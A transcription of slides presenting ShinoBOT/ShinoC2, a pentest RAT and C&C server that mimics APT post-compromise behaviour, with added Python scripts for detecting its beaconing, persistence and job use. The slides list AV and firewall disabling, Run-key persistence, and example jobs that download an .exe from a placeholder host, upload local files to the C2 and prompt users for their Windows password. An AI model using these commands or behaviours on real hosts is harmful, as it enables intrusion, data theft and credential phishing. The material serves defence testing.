ShinoBOT ShinoC2 - ToolsWatch

Transcription

ShinoBOT / ShinoC2
Can you prevent APT like me?
- the pentest tool to measure the defense against APT/RAT -
Author: Shota Shinogi

whoami
Name: Shota Shinogi (pronounced ʃota ʃinogi), @sh1n0g1
I work in the Security Research Center of Macnica Networks Corp., Japan, a Japanese distributor of security products.
My career in security:
2004  HDD Encryption (SafeBoot)
2007  Personal Firewall (Sygate)
2009  Host DLP (McAfee Host DLP)
2010  Network IPS (McAfee NSP)
2011  Web App Firewall (Citrix Netscaler)
2013  I'm here: Security Researcher (not product oriented)

strings ShinoBOT.exe
Remote Administration Tool
It connects to ShinoC2, the C&C server, every 10 sec. If it gets any jobs, it does them immediately.
Supported Platform
- Windows XP/Vista/7 (.NET Framework 2.x)
- Windows 8, not fully tested yet
Acts like a malware
Before doing the job received from ShinoC2, it acts a little bit like malware:
- Copies itself into the user home directory: C:\Users\%user%\ShinoBOT.exe
- Adds a registry entry (to start every time on boot): HKCU\Software\Microsoft\Windows\CurrentVersion\Run
- Disables Windows Firewall
- Stops the Windows Update service
- Stops the services of McAfee and Symantec Antivirus
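A fixed 10-second poll to the C2 is the most visible network trait described above, and it is what a defender can look for in proxy or firewall logs: a client/server pair whose request spacing barely varies. The following detection is an added example written for this page, not code from ShinoBOT or ShinoC2; the log format, hostnames and addresses are constructed, and the jitter threshold is an assumption you would tune to your own environment.

```python
"""Beacon detection over constructed proxy log lines.

ShinoBOT polls its C2 every 10 seconds, so a (client, server) pair whose
request intervals are nearly constant stands out against ordinary browsing.
Added defender example, not part of ShinoBOT or ShinoC2. The log format and
all addresses below are constructed for the example.
"""
from collections import defaultdict
from datetime import datetime
from statistics import median, pstdev

# Constructed sample: "timestamp client_ip dest_host path"
SAMPLE_LOG = """\
2013-06-01T10:00:00 10.0.0.5 c2.example.test /job
2013-06-01T10:00:10 10.0.0.5 c2.example.test /job
2013-06-01T10:00:20 10.0.0.5 c2.example.test /job
2013-06-01T10:00:30 10.0.0.5 c2.example.test /job
2013-06-01T10:00:40 10.0.0.5 c2.example.test /job
2013-06-01T10:00:50 10.0.0.5 c2.example.test /job
2013-06-01T10:00:03 10.0.0.7 news.example.test /
2013-06-01T10:00:04 10.0.0.7 news.example.test /style.css
2013-06-01T10:00:31 10.0.0.7 news.example.test /article/1
2013-06-01T10:01:45 10.0.0.7 news.example.test /article/2
2013-06-01T10:02:02 10.0.0.7 news.example.test /article/3
2013-06-01T10:04:10 10.0.0.7 news.example.test /logo.png
"""

def parse_log(text):
    """Return {(client, dest): [datetime, ...]} with timestamps sorted."""
    seen = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, dest, _path = line.split(maxsplit=3)
        seen[(client, dest)].append(datetime.fromisoformat(ts))
    return {k: sorted(v) for k, v in seen.items()}

def find_beacons(text, min_requests=5, max_jitter_ratio=0.1):
    """Flag (client, dest) pairs whose request spacing is nearly constant.

    A pair is reported when it has at least `min_requests` requests and the
    population standard deviation of the gaps is within `max_jitter_ratio`
    of the median gap. Returns a list of (client, dest, median_gap_seconds).
    The threshold values are assumptions for this example.
    """
    hits = []
    for (client, dest), stamps in parse_log(text).items():
        if len(stamps) < min_requests:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        med = median(gaps)
        if med > 0 and pstdev(gaps) <= max_jitter_ratio * med:
            hits.append((client, dest, med))
    return hits

if __name__ == "__main__":
    for client, dest, gap in find_beacons(SAMPLE_LOG):
        print(f"beacon candidate: {client} -> {dest} every ~{gap:.0f}s")
```

Only the 10.0.0.5 pair is reported; the browsing host has irregular gaps and drops out. A real ShinoBOT connection may carry a little scheduler jitter, which is why the check compares spread against the median rather than demanding exact 10-second gaps.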

whois ShinoC2
ShinoC2 is the Command & Control server for ShinoBOT.
You (red team) can create a job and send it to your ShinoBOT-affected devices.
It has a web GUI so you can operate it from your favorite browser, smart device, etc.
[Diagram: ShinoBOT accesses ShinoC2 and sends results; ShinoC2 returns commands to ShinoBOT]

more purpose of ShinoBOT ShinoC2.txt
The steps before "Install" of the Kill Chain are called the PRE-COMPROMISED phase.

Phase | Attacker's Activity | How to prevent
Recon | Social engineering; collecting info from SNS, press releases, more and more | User education (how about foolish users? sigh)
Weaponization | Using a packer, XOR crypt, etc. to evade AV/IPS | IPS/AV (efficient only for the known)
Delivery | Send by email; drive-by download | Gateway antivirus (efficient only for the known)
Exploit | Attack a vulnerability in IE, Adobe, Java, etc. | Patches, patches, patches (how about zero-day attacks?)

It is very difficult to prevent those steps perfectly. So we have to consider how to prevent the following steps.

tail purpose of ShinoBOT ShinoC2.txt
The following steps, called POST-COMPROMISED, are covered by ShinoBOT.

Phase | Attacker's Activity | Coverage of ShinoBOT
Install | Install RAT | ShinoBOT
C&C | Connect to C&C | ShinoBOT
Actions on Objective | Critical data exfiltration | ShinoBOT

You can use ShinoBOT/ShinoC2 to test your environment and learn what happens after a zero-day attack succeeds.
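The "Install" step is where ShinoBOT gives a defender host-side evidence: the "strings ShinoBOT.exe" slide lists a Run-key entry pointing into the user profile, a stopped Windows Update service, stopped antivirus services and a disabled firewall, all on one host within moments of each other. The correlation below is an added example for this page, not code from ShinoBOT or ShinoC2; the event records are constructed and simplified (in practice they would be fed from sources such as Sysmon registry events and the Service Control Manager log), and the watched service names and the 60-second window are assumptions.

```python
"""Host-side correlation for the behaviour ShinoBOT shows before it runs a
job: a Run-key entry pointing into the user profile, a stopped Windows Update
or antivirus service, and a firewall change on the same host within a short
window. Added defender example, not code from ShinoBOT or ShinoC2; the event
records are constructed and simplified."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed, normalised host events: (timestamp, host, kind, detail)
EVENTS = [
    ("2013-06-01T09:59:58", "PC-01", "registry_set",
     "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ShinoBOT=C:\\Users\\alice\\ShinoBOT.exe"),
    ("2013-06-01T09:59:59", "PC-01", "service_stopped", "wuauserv"),
    ("2013-06-01T10:00:00", "PC-01", "service_stopped", "McShield"),
    ("2013-06-01T10:00:00", "PC-01", "firewall_changed", "enabled=false"),
    ("2013-06-01T11:30:00", "PC-02", "service_stopped", "wuauserv"),   # lone stop, no persistence
    ("2013-06-01T12:00:00", "PC-03", "registry_set",                   # benign-looking Run entry
     "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater=C:\\Program Files\\Vendor\\updater.exe"),
]

RUN_KEY = "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
# Assumed service names for the example: Windows Update and a McAfee on-access scanner.
WATCHED_SERVICES = {"wuauserv", "McShield"}

def classify(event):
    """Label one event as 'persistence', 'tamper', or None."""
    _ts, _host, kind, detail = event
    if kind == "registry_set" and RUN_KEY in detail:
        # Only the value side matters: an autorun whose target lives under C:\Users
        target = detail.split("=", 1)[-1]
        if "\\Users\\" in target:
            return "persistence"
    if kind == "service_stopped" and detail in WATCHED_SERVICES:
        return "tamper"
    if kind == "firewall_changed" and "enabled=false" in detail:
        return "tamper"
    return None

def correlate(events, window=timedelta(seconds=60)):
    """Return {host: number of tamper events within `window` of a persistence event}.

    Hosts with persistence but no nearby tampering, or tampering alone, are
    not reported, which keeps ordinary installs and service restarts quiet.
    """
    by_host = defaultdict(list)
    for ev in events:
        label = classify(ev)
        if label:
            by_host[ev[1]].append((datetime.fromisoformat(ev[0]), label))
    hits = {}
    for host, labelled in by_host.items():
        persist = [t for t, lab in labelled if lab == "persistence"]
        tamper = [t for t, lab in labelled if lab == "tamper"]
        near = [t for t in tamper if any(abs(t - p) <= window for p in persist)]
        if near:
            hits[host] = len(near)
    return hits

if __name__ == "__main__":
    for host, n in correlate(EVENTS).items():
        print(f"{host}: Run-key persistence plus {n} defence-tampering event(s) within 60s")
```

Only PC-01 is reported. PC-02 stopped Windows Update on its own, which happens during normal maintenance, and PC-03 added a Run entry that does not point into a user profile, so neither reaches the threshold of persistence plus tampering on one host.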

man ShinoBOT
How to set up
1. Download ShinoBOT
2. Run ShinoBOT
3. That's all.
How to use
1. Access ShinoC2
2. Click the [HOST] link. Your host will be there.
3. Click [Assign Job]
4. Select the job you want to run on your host. (You can also create your own job; see the slide "man ShinoC2: job".)
5. Enter the password provided by the GUI of ShinoBOT
6. Press the [Assign] button.
7. Wait 10 seconds.
8. Your job will be done.

Seeing is believing

SBOTshot: ShinoBOT GUI
It has a GUI?
Yes. ShinoBOT is not a tool for the bad people, so I made ShinoBOT not run silently. This is also the reason why you need the password to send the job.

SBOTshot: ShinoC2

man ShinoC2: job, page 1
You can create your own job from the job menu.

man ShinoC2: job, page 2
The "command" will be redirected to cmd.exe, except for these special commands.

Command | Notes | Example
SBOTshot | Take a screenshot | SBOTshot
SBOTwget | Download a file | SBOTwget:http://www.xxx/aaa.exe
SBOTfget | Upload the local file to C2 | SBOTfget:C:\boot.ini
SBOTrunA | Run a process asynchronously (ShinoBOT will not wait until the process ends) | SBOTrunA:notepad.exe
SBOTmbox | Show a message box | SBOTmbox:hello there
SBOTibox | Show an input box (you can ask something to the user) | SBOTibox:input your windows password
SBOTexit | Kill ShinoBOT | SBOTexit
SBOTclpb | Get the data from the clipboard | SBOTclpb

* All commands are case sensitive.
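After an exercise the blue team usually wants to know which of these jobs were actually sent, and which post-compromise step each one exercised. The job format is simple: an exact, case-sensitive SBOT* name, an optional colon-separated argument, and anything else goes to cmd.exe. The triage script below is an added example for this page, not code from ShinoBOT or ShinoC2; the category labels are assumptions made here for reporting, and the job log is constructed.

```python
"""Triage of ShinoC2 job strings after an exercise. ShinoBOT hands a job to
cmd.exe unless it is one of the special SBOT* commands from the job page,
and that match is case sensitive. Added example for a blue team reviewing
which jobs were run, not code from ShinoBOT or ShinoC2; the category labels
are assumptions made here for reporting."""
from collections import Counter

# Special commands as documented on the job page -> (description, assumed category)
SPECIAL = {
    "SBOTshot": ("take a screenshot", "collection"),
    "SBOTwget": ("download a file", "ingress_tool_transfer"),
    "SBOTfget": ("upload a local file to C2", "exfiltration"),
    "SBOTrunA": ("run a process asynchronously", "execution"),
    "SBOTmbox": ("show a message box", "user_interaction"),
    "SBOTibox": ("show an input box", "credential_prompt"),
    "SBOTexit": ("kill ShinoBOT", "control"),
    "SBOTclpb": ("read the clipboard", "collection"),
}

def triage(job):
    """Split one job into command, argument, category and note.

    Only an exact, case-sensitive SBOT* prefix is special; anything else,
    including 'sbotshot', is what ShinoBOT would hand to cmd.exe, so the
    whole string is kept as the argument in that case.
    """
    name, _sep, arg = job.partition(":")
    if name in SPECIAL:
        desc, category = SPECIAL[name]
        return {"command": name, "argument": arg, "category": category, "note": desc}
    return {"command": "cmd.exe", "argument": job, "category": "shell", "note": "redirected to cmd.exe"}

def summarize(jobs):
    """Count job categories so a report can say which post-compromise steps were exercised."""
    return Counter(triage(j)["category"] for j in jobs)

# Constructed job log for the example
SAMPLE_JOBS = [
    "SBOTshot",
    "SBOTwget:http://www.xxx/aaa.exe",
    "SBOTfget:C:\\boot.ini",
    "SBOTibox:input your windows password",
    "sbotshot",          # wrong case: not special, goes to cmd.exe
    "dir C:\\Users",
    "SBOTclpb",
]

if __name__ == "__main__":
    for job in SAMPLE_JOBS:
        t = triage(job)
        print(f"{t['category']:<22} {t['command']:<8} {t['argument']}")
    print(dict(summarize(SAMPLE_JOBS)))
```

The case-sensitivity rule matters for triage: "sbotshot" is not a screenshot request but a string cmd.exe will try to run and fail on, so it is counted as a shell job. Arguments such as the SBOTfget path or the SBOTwget URL are what you would cross-check against file-access and proxy logs to confirm the exercise was observed.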

vim Roadmap
Coming soon:
- Take a snapshot from the webcam.
- Encrypt the C&C channel, not using SSL.
- Encrypt strings in the binary.
- Hide itself by a kernel driver (become a rootkit).
